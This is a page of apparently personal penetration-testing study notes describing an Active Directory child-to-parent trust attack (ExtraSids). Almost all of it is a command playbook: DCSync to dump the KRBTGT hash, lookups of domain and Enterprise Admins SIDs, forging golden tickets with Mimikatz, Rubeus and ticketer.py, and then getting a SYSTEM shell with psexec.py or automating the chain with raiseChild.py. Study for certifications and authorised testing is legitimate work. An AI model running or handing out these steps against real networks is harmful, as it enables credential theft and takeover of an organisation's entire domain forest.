📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Windows
  • ExtraSids Attack - Mimikatz
  • Linux
  1. Active Directory
  2. Attacking Trusts

Child -> Parent Trusts

Windows

ExtraSids Attack - Mimikatz

To perform this attack after compromising a child domain, we need the following:

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain (does not need to exist!)

  • The FQDN of the child domain.

  • The SID of the Enterprise Admins group of the root domain.

  • With this data collected, the attack can be performed with Mimikatz.

# Obtaining the KRBTGT Account's NT Hash using Mimikatz, which also gives SID
PS C:\>  mimikatz # lsadump::dcsync /user:LOGISTICS\\krbtgt

# alternative to get SID using PowerView
Get-DomainSID

# Obtaining Enterprise Admins Group's SID using Get-DomainGroup from PowerView
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Or using cmdlet  
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL".

# Creating a Golden Ticket with Mimikatz
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Checking if Golden ticket for non existant user hacker is residing in memory
klist

ExtraSids Attack - Rubeus

# Creating a Golden Ticket using Rubeus
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Linux

# Performing DCSync with secretsdump.py
secretsdump.py child.domain.local/adm@ip -just-dc-user child/krbtgt

# Performing SID Brute Forcing using lookupsid.py
# to create their SID : DOMAIN_SID-RID
lookupsid.py child.domain.local/adm@ip

# Looking for the Domain SID
lookupsid.py child.domain.local/adm@ip | grep -B12 "Enterprise Admins"

# Constructing a Golden Ticket using ticketer.py
ticketer.py -nthash 9d7---5f -domain CHILD.DOMAIN.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

# Setting the KRB5CCNAME Environment Variable
export KRB5CCNAME=hacker.ccache

# Getting a SYSTEM shell using Impacket's psexec.py
psexec.py CHILD.DOMAIN.LOCAL/hacker@dc01.domain.local -k -no-pass -target-ip ip

OOORRR 
# Automating all of above 
# Performing the Attack with raiseChild.py
raiseChild.py -target-exec ip CHILD.DOMAIN.LOCAL/adm
PreviousEnumerating Trust RelationshipsNextCross-Forest Trust Abuse

Last updated 2 years ago